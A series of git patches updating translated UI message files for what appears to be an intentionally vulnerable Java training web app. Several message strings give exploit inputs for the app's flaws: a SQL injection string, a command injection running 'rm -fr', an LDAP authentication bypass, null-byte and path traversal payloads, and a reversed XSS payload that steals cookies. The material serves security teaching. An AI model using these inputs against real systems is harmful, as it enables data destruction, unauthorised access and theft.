From 0a8763cc3b71be8bce37ace5960804d3558ba9ce Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 13 Sep 2017 22:57:19 +0900 Subject: [PATCH 001/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index b17306d..7ad1732 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -55,8 +55,8 @@ function.name.slow.string.plus.operation=\u30d7\u30e9\u30b9\u6f14\u7b97\u5b50\u3 function.description.slow.string.plus.operation=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u9023\u7d50\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308b\u9045\u5ef6 function.description.slow.unnecessary.object.creation=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u6642\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.name.stop.the.world=\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9 -function.description.stop.the.world=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.name.stop.the.world=\u30b9\u30c8\u30c3\u30d7 \u30b6 \u30ef\u30fc\u30eb\u30c9 +function.description.stop.the.world=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b9\u30c8\u30c3\u30d7 \u30b6 \u30ef\u30fc\u30eb\u30c9\u304c\u767a\u751f\u3057\u307e\u3059\u3002 section.vulnerabilities=\u8106\u5f31\u6027 From bc654cbe945da8a09db70f5a875157cacb2cd32c Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 13 Sep 2017 23:11:58 +0900 Subject: [PATCH 002/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 7ad1732..b17306d 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -55,8 +55,8 @@ function.name.slow.string.plus.operation=\u30d7\u30e9\u30b9\u6f14\u7b97\u5b50\u3 function.description.slow.string.plus.operation=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u9023\u7d50\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308b\u9045\u5ef6 function.description.slow.unnecessary.object.creation=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u6642\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.name.stop.the.world=\u30b9\u30c8\u30c3\u30d7 \u30b6 \u30ef\u30fc\u30eb\u30c9 -function.description.stop.the.world=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b9\u30c8\u30c3\u30d7 \u30b6 \u30ef\u30fc\u30eb\u30c9\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.name.stop.the.world=\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9 +function.description.stop.the.world=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9\u304c\u767a\u751f\u3057\u307e\u3059\u3002 section.vulnerabilities=\u8106\u5f31\u6027 From e9081034e01530fb6ca1bf3897972c85933c13ba Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:20:55 +0900 Subject: [PATCH 003/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From 4b41da6701b08de0e9e24d6d3e9442356eb40c26 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:20:57 +0900 Subject: [PATCH 004/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From ee0685bfa592a3b40538f1103bd81b09e123b760 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:20:59 +0900 Subject: [PATCH 005/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From 1b73c464e6631b707cb6cda8553f7b9316abf260 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:21:01 +0900 Subject: [PATCH 006/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index b17306d..9164812 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\ msg.note.open.redirect=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bgoto\=[\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL]\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001\u30c1\u30a7\u30c3\u30af\u305b\u305a\u306b\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3057\u307e\u3059\u3002 msg.note.socket.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.unrestricted.ext.upload=<% System.exit(0); %>\u3068\u66f8\u3044\u305fJSP\u30d5\u30a1\u30a4\u30eb(\u30d5\u30a1\u30a4\u30eb\u540d\uff1aexit.jsp)\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001http\://localhost\:8080/uploadFiles/exit.jsp\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\nJavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 -msg.note.unintended.file.disclosure=\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30ea\u30b9\u30c6\u30a3\u30f3\u30b0\u304c\u6a5f\u80fd\u3057\u3066\u3044\u308b\u5834\u5408\u3001http\://localhost\:8080/uid/\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\u305d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306e\u30d5\u30a1\u30a4\u30eb\u4e00\u89a7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u3055\u3089\u306bhttp\://localhost\:8080/uid/adminpassword.txt\u306b\u8a18\u8f09\u3055\u308c\u305f\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3068\u3001http\://localhost\:8080/uid/serverinfo.html\u3078\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 msg.note.verbose.errror.message=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u753b\u9762\u3067\u306e\u8a8d\u8a3c\u30a8\u30e9\u30fc\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u8a73\u7d30\u904e\u304e\u308b\u305f\u3081\u3001\u30ed\u30b0\u30a4\u30f3\u53ef\u80fd\u306a\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u63a8\u6e2c\u3057\u3084\u3059\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002 msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 From dc6e8bc1935e0ce9a642fba5ec4fcf60c9ae9f23 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:21:03 +0900 Subject: [PATCH 007/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From 7355718bd4963a76dbdfc70cff73c6956e49934b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:21:05 +0900 Subject: [PATCH 008/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From 63bbbb69f5564956e50bd069c9d05d2009f90cab Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:21:07 +0900 Subject: [PATCH 009/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From acd99c6c8cfbad10c1fdc93505b0d994d6e7cd1b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 21 Sep 2017 02:21:09 +0900 Subject: [PATCH 010/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 0acdd7a..3c2fad4 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -263,7 +263,7 @@ msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.html. +msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. From ae9a1d34fdb14424c5e7f5a30885de37d5095058 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:35 +0900 Subject: [PATCH 011/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators 